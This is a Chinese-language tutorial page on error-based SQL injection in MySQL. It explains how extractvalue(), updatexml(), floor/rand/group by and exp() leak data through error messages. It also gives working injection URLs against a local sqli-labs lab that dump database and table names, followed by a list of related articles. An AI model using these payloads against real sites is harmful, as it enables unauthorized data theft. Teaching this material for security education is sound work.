SQL注入教程之报错注入

目录
  • SQL报错注入概述
  • 报错注入的前提条件
  • Xpath类型函数
    • extractvalue()
    • updatexml()
  • 其他函数
    • floor()、rand()、count()、groupby联用
    • exp()(5.5.5<=MySQL数据库版本号<=5.5.49)
  • MySQL数据库报错功能函数总汇
  • 报错注入实例
    • extractvalue()
      • 暴库
      • 暴表
    • updatexml()
      • 暴库
      • 暴表
  • 总结

SQL报错注入概述

通过构造特定的SQL语句,让攻击者想要查询的信息(如数据库名、版本号、用户名等)通过页面面的错误提示回显出来。

报错注入的前提条件

  • Web应用程序未关闭数据库报错函数,对于一些SQL语句的错误直接回显在页面上
  • 后台未对一些具有报错功能的函数(如extractvalue、updatexml等)进行过滤

Xpath类型函数

extractvalue()

作用:对XML文档进行查询,相当于在HTML文件中用标签查找元素。

语法: extractvalue( XML_document, XPath_string )

  • 参数1:XML_document是String格式,为XML文档对象的名称
  • 参数2:XPath_string(Xpath格式的字符串),注入时可操作的地方

报错原理:xml文档中查找字符位置是用/xxx/xxx/xxx/...这种格式,如果写入其他格式就会报错,并且会返回写入的非法格式内容,错误信息如:XPATH syntax error:'xxxxxxxx‘

updatexml()

作用:改变文档中符合条件的节点的值。

语法: updatexml( XML_document, XPath_string, new_value )

  • 参数1:XML_document是String格式,为XML文档对象的名称
  • 参数2:XPath_string(Xpath格式的字符串),注入时可操作的地方
  • 参数3:new_value,String格式,替换查找到的符合条件的数据

报错原理:同extractvalue()

其他函数

floor()、rand()、count()、group by联用

作用

floor(x):对参数x向下取整

rand():生成一个0~1之间的随机浮点数

count(*):统计某个表下总共有多少条记录

group by x: 按照 (by) 一定的规则(x)进行分组

报错原理:group by与rand()使用时,如果临时表中没有该主键,则在插入前会再计算一次rand(),然后再由group by将计算出来的主键直接插入到临时表格中,导致主键重复报错

exp()(5.5.5<= MySQL数据库版本号<=5.5.49)

作用:计算以e(自然常数)为底的幂值

语法: exp(x)

报错原理:当参数x超过710时,exp()函数会报错,错误信息如:DOUBLE value is of range:

MySQL数据库报错功能函数总汇

报错注入实例

extractvalue()

依然用sqli/Less-1

直接用报错函数进行暴库操作

暴库

http://127.0.0.1/sqli/Less-1/?id=1' and extractvalue(1,concat('~',database())) --+

暴表

http://127.0.0.1/sqli/Less-1/?id=1' and extractvalue(1,concat('~',(select group_concat(table_name) from information_schema.tables where table_schema='security'))) --+

后面的步骤大致相同,不再演示

updatexml()

暴库

http://127.0.0.1/sqli/Less-1/?id=1' and updatexml(1,concat('~',database()),1) --+

暴表

http://127.0.0.1/sqli/Less-1/?id=1' and updatexml(1,concat('~',(select group_concat(table_name) from information_schema.tables where table_schema='security')),1) --+

总结

到此这篇关于SQL注入教程之报错注入的文章就介绍到这了,更多相关SQL报错注入内容请搜索我们以前的文章或继续浏览下面的相关文章希望大家以后多多支持我们!

(0)

相关推荐

  • SQL注入教程之报错注入

    目录 SQL报错注入概述 报错注入的前提条件 Xpath类型函数 extractvalue() updatexml() 其他函数 floor().rand().count().groupby联用 exp()(5.5.5<=MySQL数据库版本号<=5.5.49) MySQL数据库报错功能函数总汇 报错注入实例 extractvalue() 暴库 暴表 updatexml() 暴库 暴表 总结 SQL报错注入概述 通过构造特定的SQL语句,让攻击者想要查询的信息(如数据库名.版本号.用户名等)通

  • Web安全解析报错注入攻击原理

    目录 1.报错注入攻击 2.报错注入代码分析 1.报错注入攻击 报错注入攻击的测试地址:http://127.0.0.1/sqli/error.php?username=1. 访问该网址时,页面返回ok,如图28所示. 图28 访问username=1时页面的的结果 访问http://127.0.0.1/sqli/error.php?username=1',因为参数username的值是1',在数据库中执行SQL时,会因为多了一个单引号而报错,输出到页面的结果如图29所示. 图29 访问user

  • SQL注入报错注入函数图文详解

    目录 前言 常用报错函数 用法详解 updatexml()函数 实例 extractvalue()函数 floor()函数 exp()函数 12种报错注入函数 总结 前言 报错注入的前提是当语句发生错误时,错误信息被输出到前端.其漏洞原因是由于开发人员在开发程序时使用了print_r (),mysql_error(),mysqli_connect_error()函数将mysql错误信息输出到前端,因此可以通过闭合原先的语句,去执行后面的语句. 常用报错函数 updatexml()        

  • MYSQL updatexml()函数报错注入解析

    首先了解下updatexml()函数 UPDATEXML (XML_document, XPath_string, new_value); 第一个参数:XML_document是String格式,为XML文档对象的名称,文中为Doc 第二个参数:XPath_string (Xpath格式的字符串) ,如果不了解Xpath语法,可以在网上查找教程. 第三个参数:new_value,String格式,替换查找到的符合条件的数据 作用:改变文档中符合条件的节点的值 改变XML_document中符合X

  • SQL Server附加数据库报错无法打开物理文件,操作系统错误5的图文解决教程

    问题描述: 附加数据时,提示无法打开物理文件,操作系统错误5.如下图: 问题原因:可能是文件访问权限方面的问题. 解决方案:找到数据库的mdf和ldf文件,赋予权限即可.如下图: 找到mdf和ldf文件,本演示以ldf为例. 1.点击文件右键属性-->安全-->编辑 2.编辑-->添加 3.添加-->高级 4.高级-->立即查找-->搜索结果中找到-->Everyone-->确定-->确定 5.确定-->默认选中的Everyone用户-->

  • @Autowired注解注入的xxxMapper报错问题及解决

    目录 @Autowired注解注入的xxxMapper报错 项目场景 问题描述 解决方案 分析 @Autowired无法加载Mapper,报错404或者500 @Autowired注解注入的xxxMapper报错 项目场景 Mybatis-Plus测试 问题描述 在Mybatis-Plus场景的测试中发现,通过@Autowired注解注入的userMapper会报错 这是因为UserMapper 并不是一个可以创建出对象的一个类,而是一个接口. @Override public void run

  • C#中SQL参数传入空值报错解决方案

    C#中的null与SQL中的NULL是不一样的,SQL中的NULL用C#表示出来就是DBNull.Value. 注意:SQL参数是不能接受C#的null值的,传入null就会报错. 下面我们看个例子: SqlCommand cmd=new SqlCommand("Insert into Student values(@StuName,@StuAge)" ,conn); cmd.parameters.add("@StuName" ,stuName); cmd.para

  • Navicat连接SQL Server数据:报错08001-命名管道提供程序的完美解决方法

    新安装了SQL server用Navicat进行连接时出现下面的问题 首先用SQL server自带的GUI用windows认证的方式进入,重新配置了登录名和登录密码分别为CDSS和CDSS,之后直接采用此登录名和登录密码发现还是连不上,后来的解决办法是,把服务重新启动一下. 修改配置登录名后需要重启一下服务?好像有那么点道理,注意是重启服务而不仅仅是重启GUI. mark一下服务列表的打开路径:开始→控制面板→系统和安全→管理工具→服务 还有一个是SQL server配置管理器,打开网络配置,

  • Mybatis Plus查询时sql字段名大小写报错的解决

    目录 Mybatis Plus查询时sql字段名大小写报错 遇到报错 错误解析 解决方案 Mybatis Plus返回map大小写问题 Mybatis Plus查询时sql字段名大小写报错 遇到报错 错误解析 在数据库中没有找到img_url 列 数据库字段名是是大写 解决方案 在application.properties中加: mybatis-plus.configuration.map-underscore-to-camel-case=false 完美运行~ Mybatis Plus返回m

  • PL/SQL登录Oracle数据库报错ORA-12154:TNS:无法解析指定的连接标识符已解决(本地未安装Oracle需要连接服务器上的)

    ORA-12154:TNS:无法解析指定的连接标识符 ORA-12154:TNS:无监听程序 错误分析一.PL/SQL 客户端登录到数据库,如果配置错误会有以上错误,如下图. 这个错误主要是pl/sql客户端的tnsnames.ora配置错误,或者是输入 database选项错误. 错误分析二.未配置环境变量 所以解决问题之前一定要配置环境变量TNS_ADMIN path添加:E:\PLSQL Developer(64)\instantclient_11_2 配置环境变量就是为了让PL/SQL

随机推荐